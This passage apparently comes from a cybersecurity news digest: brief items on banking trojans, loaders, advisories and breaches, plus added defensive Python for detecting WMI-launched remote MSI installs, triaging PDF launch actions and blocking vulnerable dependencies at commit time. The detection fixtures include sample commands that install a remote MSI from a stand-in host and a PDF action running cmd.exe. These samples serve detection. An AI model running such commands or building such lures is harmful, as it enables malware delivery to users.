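        print(f"{check}: {'ok' if ok else 'FAIL'}")
```

The point worth keeping from the scenario: the break-glass grant is itself an authorized action (the `grant` permission), is scoped to a role rather than to arbitrary permissions, and expires without anyone having to remember to revoke it.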

 Malware and Vulnerabilities

The Grandoreiro banking Trojan has resurfaced with major updates, including enhanced functionality and the ability to target over 1500 global banking applications and websites in more than 60 countries, making it a more potent threat.

 Laws, Policy, Regulations

The White House unveiled a framework to protect U.S. workers from AI risks, emphasizing health and safety rights, governance, human oversight, and transparency as organizations adopt new technologies.

 Govt., Critical Infrastructure

Eric Goldstein, the executive assistant director for cybersecurity at CISA, is leaving the agency in June after playing a crucial role in driving the agency's secure-by-design initiatives and strengthening partnerships with the private sector.

 Incident Response, Learnings

Two Chinese nationals have been indicted for their alleged involvement in a multimillion-dollar "pig butchering" investment fraud scheme, where they laundered over $73 million through US financial institutions and cryptocurrency wallets.

 Trends, Reports, Analysis

The enterprise attack surface is rapidly expanding due to the convergence of IT and OT systems, leading to a large number of ICS assets being exposed to the public internet and creating new vulnerabilities that security teams struggle to manage.

 Laws, Policy, Regulations

The SEC has approved new regulations that require broker-dealers and investment firms to notify their clients within 30 days of detecting a data breach, in an effort to modernize and enhance the protection of consumers' financial data.

 Incident Response, Learnings

The judge said the plaintiffs did not show an "administratively feasible" way for the court to determine whether a particular individual is a class member without extensive and individualized fact-finding.

 Feed

Ubuntu Security Notice 6777-2 - Zheng Wang discovered that the Broadcom FullMAC WLAN driver in the Linux kernel contained a race condition during device removal, leading to a use-after-free vulnerability. A physically proximate attacker could possibly use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

 Feed

Ubuntu Security Notice 6766-3 - It was discovered that the Open vSwitch implementation in the Linux kernel could overflow its stack during recursive action operations under certain conditions. A local attacker could use this to cause a denial of service. Sander Wiebing, Alvise de Faveri Tron, Herbert Bos, and Cristiano Giuffrida discovered that the Linux kernel mitigations for the initial Branch History Injection vulnerability were insufficient for Intel processors. A local attacker could potentially use this to expose sensitive information.

 Feed

Red Hat Security Advisory 2024-2912-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include bypass and use-after-free vulnerabilities.

 Feed

Red Hat Security Advisory 2024-2911-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include bypass and use-after-free vulnerabilities.

 Feed

Red Hat Security Advisory 2024-2910-03 - An update for nodejs is now available for Red Hat Enterprise Linux 9. Issues addressed include HTTP request smuggling, denial of service, and out of bounds read vulnerabilities.

 Feed

Red Hat Security Advisory 2024-2907-03 - An update for the httpd:2.4 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a denial of service vulnerability.

 Feed

Red Hat Security Advisory 2024-2906-03 - An update for firefox is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include bypass and use-after-free vulnerabilities.

 Feed

Red Hat Security Advisory 2024-2905-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include bypass and use-after-free vulnerabilities.

 Feed

Red Hat Security Advisory 2024-2904-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include bypass and use-after-free vulnerabilities.

 Feed

Red Hat Security Advisory 2024-2903-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include bypass and use-after-free vulnerabilities.

 Feed

Cybersecurity researchers have observed a spike in email phishing campaigns starting early March 2024 that deliver Latrodectus, a nascent malware loader believed to be the successor to the IcedID malware. "These campaigns typically involve a recognizable infection chain involving oversized JavaScript files that utilize WMI's ability to invoke msiexec.exe and install a remotely-hosted MSI
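An added detection example, written for this page rather than taken from the report: the chain described above (a script host running a .js file that then uses WMI to start msiexec.exe against a remote MSI) does not appear as a wscript.exe to msiexec.exe parent/child relationship, because a process created through WMI is parented by WmiPrvSE.exe. The Python below therefore matches msiexec.exe under WmiPrvSE.exe with an http(s) MSI path, then correlates it with a script-host launch on the same host shortly before to raise the severity. The key=value event lines are constructed for the example and do not follow any real EDR or Sysmon schema; hostnames, paths and URLs are fictitious.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (a key=value layout made up for this example;
# not a real Sysmon or EDR schema). Hosts, users, paths and URLs are fictitious.
SAMPLE_EVENTS = r'''
ts=2024-03-05T09:14:02Z host=WS01 pid=4120 ppid=3300 image="C:\Windows\System32\wscript.exe" parent="C:\Windows\explorer.exe" cmd="wscript.exe C:\Users\a\Downloads\document_84213.js"
ts=2024-03-05T09:14:03Z host=WS01 pid=4188 ppid=900 image="C:\Windows\System32\msiexec.exe" parent="C:\Windows\System32\wbem\WmiPrvSE.exe" cmd="msiexec.exe /i http://example.invalid/neuro.msi /qn"
ts=2024-03-05T09:20:11Z host=WS02 pid=5100 ppid=700 image="C:\Windows\System32\msiexec.exe" parent="C:\Windows\System32\services.exe" cmd="msiexec.exe /i C:\installers\vendor.msi /qn"
ts=2024-03-05T10:02:45Z host=WS03 pid=6010 ppid=900 image="C:\Windows\System32\msiexec.exe" parent="C:\Windows\System32\wbem\WmiPrvSE.exe" cmd="msiexec.exe /i https://cdn.example.invalid/update.msi /qn"
'''

KV = re.compile(r'(\w+)=("([^"]*)"|\S+)')          # key=value or key="value with spaces"
REMOTE_MSI = re.compile(r'https?://\S+\.msi\b', re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def parse_event(line: str) -> dict:
    ev = {m.group(1): (m.group(3) if m.group(3) is not None else m.group(2))
          for m in KV.finditer(line)}
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def load_events(text: str) -> list:
    return [parse_event(line) for line in text.strip().splitlines()]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_wmi_msiexec_chain(events: list, window: timedelta = timedelta(seconds=120)) -> list:
    """Flag msiexec.exe spawned by WmiPrvSE.exe with a remote .msi. Severity is raised
    when a script host ran a .js on the same host within `window` beforehand, since the
    WMI hop hides that lineage from a plain parent/child rule."""
    script_runs = [e for e in events
                   if basename(e["image"]) in SCRIPT_HOSTS and re.search(r"\.js\b", e["cmd"], re.I)]
    findings = []
    for e in events:
        if basename(e["image"]) != "msiexec.exe" or basename(e["parent"]) != "wmiprvse.exe":
            continue
        m = REMOTE_MSI.search(e["cmd"])
        if not m:
            continue                      # local MSI via WMI: noisy, not this chain
        related = [s for s in script_runs
                   if s["host"] == e["host"] and timedelta(0) <= e["ts"] - s["ts"] <= window]
        findings.append({
            "host": e["host"],
            "pid": int(e["pid"]),
            "url": m.group(0),
            "severity": "high" if related else "medium",
            "script_cmd": related[0]["cmd"] if related else None,
        })
    return findings


if __name__ == "__main__":
    for f in detect_wmi_msiexec_chain(load_events(SAMPLE_EVENTS)):
        print(f)
```

The sample has no file-size field; in telemetry that records it, the "oversized" JavaScript the snippet mentions (padding to evade size-limited scanners) is a further signal to attach to the script-host event.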

 Feed

Multiple threat actors are weaponizing a design flaw in Foxit PDF Reader to deliver a variety of malware such as Agent Tesla, AsyncRAT, DCRat, NanoCore RAT, NjRAT, Pony, Remcos RAT, and XWorm. "This exploit triggers security warnings that could deceive unsuspecting users into executing harmful commands," Check Point said in a technical report. "This exploit has been used by multiple
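As an added triage helper (not from Check Point's report, which the page does not quote in detail, and not a reproduction of the specific Foxit behaviour), the Python below scans a PDF's raw bytes for the action objects that can make a reader prompt the user or start another program on open (/OpenAction, /AA, /Launch, /JavaScript, /URI, /SubmitForm) and pulls out the target of any /Launch action. The two sample PDFs are constructed inline; the caveat built into the code is that objects inside compressed object streams are invisible to a raw scan and must be inflated first.

```python
import re

# Action triggers and action types worth flagging in a lure document.
ACTION_NAMES = [b"/OpenAction", b"/AA", b"/Launch", b"/JavaScript", b"/JS", b"/URI", b"/SubmitForm"]
WEIGHTS = {b"/Launch": 3, b"/JavaScript": 2, b"/JS": 2, b"/SubmitForm": 2,
           b"/OpenAction": 1, b"/AA": 1, b"/URI": 1}

# Constructed minimal PDFs for the demo (not real lures). The first carries a
# /Launch action fired on open; the second has no actions at all.
SAMPLE_LURE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /Type /Action /S /Launch /Win << /F (cmd.exe) /P (/c whoami) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

SAMPLE_PLAIN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""


def scan_pdf_bytes(data: bytes) -> dict:
    """Count action names in the raw bytes, extract /Launch targets and score the file.
    Caveat: a raw scan cannot see names inside FlateDecode-compressed object streams;
    'compressed_objects' tells the analyst to inflate them before trusting a clean verdict."""
    counts = {}
    for name in ACTION_NAMES:
        # the lookahead keeps /AA from also matching longer names that share the prefix
        counts[name.decode()] = len(re.findall(re.escape(name) + rb"(?![A-Za-z])", data))

    launch = []
    for block in re.findall(rb"/S\s*/Launch(.*?)endobj", data, flags=re.S):
        target = re.search(rb"/F\s*\(([^)]*)\)", block)       # program or file to launch
        params = re.search(rb"/P\s*\(([^)]*)\)", block)       # Windows-specific parameters
        launch.append((target.group(1).decode(errors="replace") if target else None,
                       params.group(1).decode(errors="replace") if params else None))

    score = sum(WEIGHTS[n] * counts[n.decode()] for n in ACTION_NAMES)
    return {
        "counts": counts,
        "launch": launch,
        "compressed_objects": b"/ObjStm" in data,
        "score": score,
        "verdict": "suspicious" if score >= 3 else "clean",
    }


if __name__ == "__main__":
    print(scan_pdf_bytes(SAMPLE_LURE_PDF))
    print(scan_pdf_bytes(SAMPLE_PLAIN_PDF))
```

A /Launch action is a documented PDF feature, so its presence is a triage signal rather than proof of malice; what the snippet above describes is precisely the case where the reader does warn and the user is talked into clicking through, which is why the extracted target and parameters matter more than the bare count.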

 Feed

All developers want to create secure and dependable software. They should feel proud to release their code with the full confidence they did not introduce any weaknesses or anti-patterns into their applications. Unfortunately, developers are not writing their own code for the most part these days. 96% of all software contains some open-source components, and open-source components make
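As an added example of the idea in the snippet (a commit-time check for known-vulnerable dependencies; this is not GitGuardian's code and does not use its API), the Python below parses a pinned requirements.txt, compares each pin against an advisory list with version ranges, reports unpinned entries it cannot assess, and exits non-zero so a pre-commit hook blocks the commit. The advisory entries, package names and manifest are constructed for the example and are not real CVEs or real projects.

```python
import re
import sys

# Constructed advisory list for illustration; IDs, package names and ranges are made up.
DEMO_ADVISORIES = [
    {"id": "DEMO-ADV-1", "package": "examplelib", "affected": ">=1.0,<1.4.2", "fixed": "1.4.2"},
    {"id": "DEMO-ADV-2", "package": "othertool", "affected": "<2.0", "fixed": "2.0"},
]

# Constructed manifest used by the demo; shaped like a typical pinned requirements.txt.
SAMPLE_REQUIREMENTS = """\
# sample manifest (constructed)
examplelib==1.3.0
othertool==2.1.0
requests>=2.0   # not pinned, so it cannot be checked against a fixed version
"""


def parse_version(v: str) -> tuple:
    """Numeric dotted versions only; non-numeric parts (rc1, post) count as 0."""
    return tuple(int(p) if p.isdigit() else 0 for p in re.split(r"[.\-]", v))


def _cmp(a: tuple, b: tuple) -> int:
    n = max(len(a), len(b))
    a, b = a + (0,) * (n - len(a)), b + (0,) * (n - len(b))
    return (a > b) - (a < b)


OPS = {">=": lambda c: c >= 0, "<=": lambda c: c <= 0, ">": lambda c: c > 0,
       "<": lambda c: c < 0, "==": lambda c: c == 0, "!=": lambda c: c != 0}


def version_in_range(version: str, spec: str) -> bool:
    """spec is a comma-separated conjunction such as '>=1.0,<1.4.2'."""
    v = parse_version(version)
    for clause in spec.split(","):
        m = re.match(r"\s*(>=|<=|==|!=|>|<)\s*(\S+)", clause)
        if not m:
            raise ValueError(f"unparseable range clause: {clause!r}")
        if not OPS[m.group(1)](_cmp(v, parse_version(m.group(2)))):
            return False
    return True


def parse_requirements(text: str):
    """Return ({name: pinned_version}, [lines that are not exact pins])."""
    pins, unpinned = {}, []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue
        m = re.match(r"([A-Za-z0-9_.\-]+)\s*==\s*([0-9][^\s;]*)", line)
        if m:
            pins[m.group(1).lower()] = m.group(2)
        else:
            unpinned.append(line)
    return pins, unpinned


def check_requirements(text: str, advisories=DEMO_ADVISORIES):
    pins, unpinned = parse_requirements(text)
    findings = []
    for adv in advisories:
        ver = pins.get(adv["package"].lower())
        if ver is not None and version_in_range(ver, adv["affected"]):
            findings.append({"id": adv["id"], "package": adv["package"],
                             "version": ver, "fixed": adv["fixed"]})
    return findings, unpinned


def main(paths) -> int:
    """Pre-commit entry point: a non-zero exit status makes git abort the commit."""
    blocked = False
    for path in paths:
        with open(path, encoding="utf-8") as fh:
            findings, unpinned = check_requirements(fh.read())
        for f in findings:
            print(f"{path}: {f['package']}=={f['version']} matches {f['id']} (fixed in {f['fixed']})")
            blocked = True
        for u in unpinned:
            print(f"{path}: '{u}' is not pinned; cannot assess")
    return 1 if blocked else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
```

Wire it in from .git/hooks/pre-commit by running it against the staged manifest (for example `python sca_check.py requirements.txt`, the script name being arbitrary); the unpinned warnings are deliberately non-blocking, since a floating range cannot be judged against a fixed version without first resolving it.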

 Feed

A "multi-faceted campaign" has been observed abusing legitimate services like GitHub and FileZilla to deliver an array of stealer malware and banking trojans such as Atomic (aka AMOS), Vidar, Lumma (aka LummaC2), and Octo by impersonating credible software like 1Password, Bartender 5, and Pixelmator Pro. "The presence of multiple malware variants suggests a broad cross-platform targeting

 Feed

An Iranian threat actor affiliated with the Ministry of Intelligence and Security (MOIS) has been attributed as behind destructive wiping attacks targeting Albania and Israel under the personas Homeland Justice and Karma, respectively. Cybersecurity firm Check Point is tracking the activity under the moniker Void Manticore, which is also known as Storm-0842 (formerly DEV-0842) by

 Cyber Security News

Source: thehackernews.com | May 20, 2024 | Newsroom | Cyber Attack / Malware. Cybersecurity researchers have observed a spike in email phishing campaigns starting early March 2024 that deliver Latrodectus, a nascent malware loader believed to be the successor to the IcedID malware. "These campaigns typically involve a recognizable infection chain involving oversized JavaScript files that utilize […] The post "Latrodectus Malware Loader Emerges as IcedID's Successor in Phishing Campaigns – Source: thehackernews.com" was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Lawrence Abrams. The American Radio Relay League (ARRL) warns it suffered a cyberattack, which disrupted its IT systems and online operations, including email and the Logbook of the World. ARRL is the national association for amateur radio in the United States, representing amateur radio interests to government regulatory bodies, providing technical advice, and […] The post "American Radio Relay League cyberattack takes Logbook of the World offline – Source: www.bleepingcomputer.com" was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Artificial Intelligence

Source: www.bleepingcomputer.com – Author: Mayank Parmar. Since Google enabled its AI-powered search feature, many people have tried and failed to disable the often incorrect AI Overviews feature in regular search results. Unfortunately, you can't. However, there are ways to turn it off using a new "Web" search mode, which we explain below. AI Overviews, also known […] The post "Frustration grows over Google's AI Overviews feature, how to disable – Source: www.bleepingcomputer.com" was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Bill Toulas. The U.S. Cybersecurity & Infrastructure Security Agency (CISA) has added three security vulnerabilities to its 'Known Exploited Vulnerabilities' catalog, one impacting Google Chrome and two affecting some D-Link routers. Adding the issues to the KEV catalog serves as a warning to federal agencies and companies that threat actors are leveraging them […] The post "CISA warns of hackers exploiting Chrome, EoL D-Link bugs – Source: www.bleepingcomputer.com" was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 British

Source: go.theregister.com – Author: Team Register. CyberUK: Emotional intelligence was at the heart of the British Library's widely hailed response to its October ransomware attack, according to CEO Roly Keating. The British Library's (BL) ransomware attack last year was one of the most damaging in recent memory, at least in the UK. The transparency of […] The post "British Library's candid ransomware comms driven by 'emotional intelligence' – Source: go.theregister.com" was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Chinese

Source: go.theregister.com – Author: Team Register. Germany may soon remove Huawei and ZTE equipment from its 5G networks, according to media reports. Bloomberg reported last Friday that Germany's Foreign Office and Ministry for Economic Affairs support an Interior Ministry proposal to remove the Chinese-made tech on grounds of national security. Under the plan, German telcos […] The post "Chinese telco gear may become verboten on German networks – Source: go.theregister.com" was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: go.theregister.com – Author: Team Register. Infosec in brief: Nissan has admitted to another data loss, this time involving the theft of personal information belonging to more than 50,000 Nissan employees. According to the carmaker's disclosure [PDF], filed with the US state of Maine, Nissan was breached back in November 2023 through "a targeted […] The post "Nissan infosec in the spotlight again after breach affecting more than 50K US employees – Source: go.theregister.com" was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com | May 20, 2024 | Newsroom | Cyber Attack / Threat Intelligence. An Iranian threat actor affiliated with the Ministry of Intelligence and Security (MOIS) has been attributed as behind destructive wiping attacks targeting Albania and Israel under the personas Homeland Justice and Karma, respectively. Cybersecurity firm Check Point is tracking the activity under the […] The post "Iranian MOIS-Linked Hackers Behind Destructive Attacks on Albania and Israel – Source: thehackernews.com" was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com. Multiple threat actors are weaponizing a design flaw in Foxit PDF Reader to deliver a variety of malware such as Agent Tesla, AsyncRAT, DCRat, NanoCore RAT, NjRAT, Pony, Remcos RAT, and XWorm. "This exploit triggers security warnings that could deceive unsuspecting users into executing harmful commands," Check Point said in […] The post "Foxit PDF Reader Flaw Exploited by Hackers to Deliver Diverse Malware Arsenal – Source: thehackernews.com" was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com | May 20, 2024 | The Hacker News | Software Security / Vulnerability. All developers want to create secure and dependable software. They should feel proud to release their code with the full confidence they did not introduce any weaknesses or anti-patterns into their applications. Unfortunately, developers are not writing their own code for the […] The post "Defending Your Commits From Known CVEs With GitGuardian SCA And Git Hooks – Source: thehackernews.com" was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Criminals

Source: thehackernews.com | May 20, 2024 | Newsroom | Malvertising / Cryptocurrency. A "multi-faceted campaign" has been observed abusing legitimate services like GitHub and FileZilla to deliver an array of stealer malware and banking trojans such as Atomic (aka AMOS), Vidar, Lumma (aka LummaC2), and Octo by impersonating credible software like 1Password, Bartender 5, and Pixelmator Pro. […] The post "Cyber Criminals Exploit GitHub and FileZilla to Deliver Malware Cocktail – Source: thehackernews.com" was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 American

Source: www.darkreading.com – Author: Apu Pavithran. After almost a decade of "will they or won't they," the United States is on the cusp of its own sweeping data privacy law. The recently proposed American Privacy Rights Act (APRA) aims to establish robust regulations about eight years after […] The post "What American Enterprises Can Learn From Europe's GDPR Mistakes – Source: www.darkreading.com" was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Android

Source: www.darkreading.com – Author: Nathan Eddy, Contributing Writer. A banking Trojan impacting Google Android devices, dubbed "Antidot" by the Cyble research team, has emerged, disguising itself as a Google Play update. The malware displays fake Google Play update pages in multiple languages, including German, French, Spanish, Russian, Portuguese, Romanian, and […] The post "Android Banking Trojan Antidot Disguised as Google Play Update – Source: www.darkreading.com" was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.schneier.com – Author: Bruce Schneier. IBM is selling its QRadar product suite to Palo Alto Networks, for an undisclosed—but probably surprisingly small—sum. I have a personal connection to this. In 2016, IBM bought Resilient Systems, the startup I was a part of. It became part of IBM's cybersecurity offerings, mostly and weirdly subservient to […] The post "IBM Sells Cybersecurity Group – Source: www.schneier.com" was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.troyhunt.com – Author: Troy Hunt. This is the 400th time I've sat down in front of the camera and done one of these videos. Every single week since the 23rd of September in 2016, regardless of location, health, stress and all sorts of other crazy things that have gone on in my life for […] The post "Weekly Update 400 – Source: www.troyhunt.com" was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
